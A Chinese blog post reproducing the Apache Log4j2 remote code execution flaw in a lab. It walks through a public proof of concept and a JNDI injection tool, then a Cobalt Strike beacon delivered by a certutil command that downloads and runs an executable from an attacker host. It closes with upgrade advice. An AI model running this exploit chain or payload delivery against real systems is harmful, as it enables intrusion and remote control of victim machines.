纯真's Blog
纯真's Blog

目录

Log4j2 RCE漏洞复现

Apache Log4j2是一款优秀的Java日志记录框架。近日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证, Apache Struts2,Apache Solr, Apache Druid, Apache Flink等均受影响。

影响产品漏洞类型漏洞评级
Apache Log4j远程代码执行漏洞严重

首先去GitHub下载漏洞poc代码环境,使用IDEA加载项目文件

打开项目文件src/main/java/log4j 在其中添加一行代码

System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");

接着去GitHub上下载JNDI注入工具

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc" -A "192.168.31.201"

将生成的EXP代码复制到漏洞POC代码中

点击IDEA工具栏运行

成功弹出计算器!漏洞利用成功!

运行CobaltStrike teamserver

teamserver.bat 192.168.31.201 123456

打开CobaltStrike连接

新建监听器保存

点击攻击 –> 生成后门 –> Windows可执行程序Stageless

选择生成的监听器,输出格式exe

点击保存

在生成的exe payload目录执行:

python -m http.server 8080

浏览器访问验证

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "certutil -urlcache -split -f http://192.168.31.201:8080/beacon.exe C:\Users\a.exe&&C:\Users\a.exe" -A "192.168.31.201"

将生成好的payload粘贴到POC代码中

点击运行

成功上线!

(1)尽快升级至最新版本

https://github.com/apache/logging-log4j2/ ;

尽快升级Apache Log4j2所有相关应用到最新的log4j-2.15.0-rc2版本

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

(2)安装杀毒软件更新最新补丁程序

本篇文章介绍了Apache Log4j2 远程代码执行漏洞的风险及漏洞利用过程,以简单直观的过程告知用户其危害以及防护措施。

https://mp.weixin.qq.com/s/AuBchaUvFw2pisVw6rNX5A

https://github.com/y35uishere/apache-log4j-poc

https://github.com/welk1n/JNDI-Injection-Exploit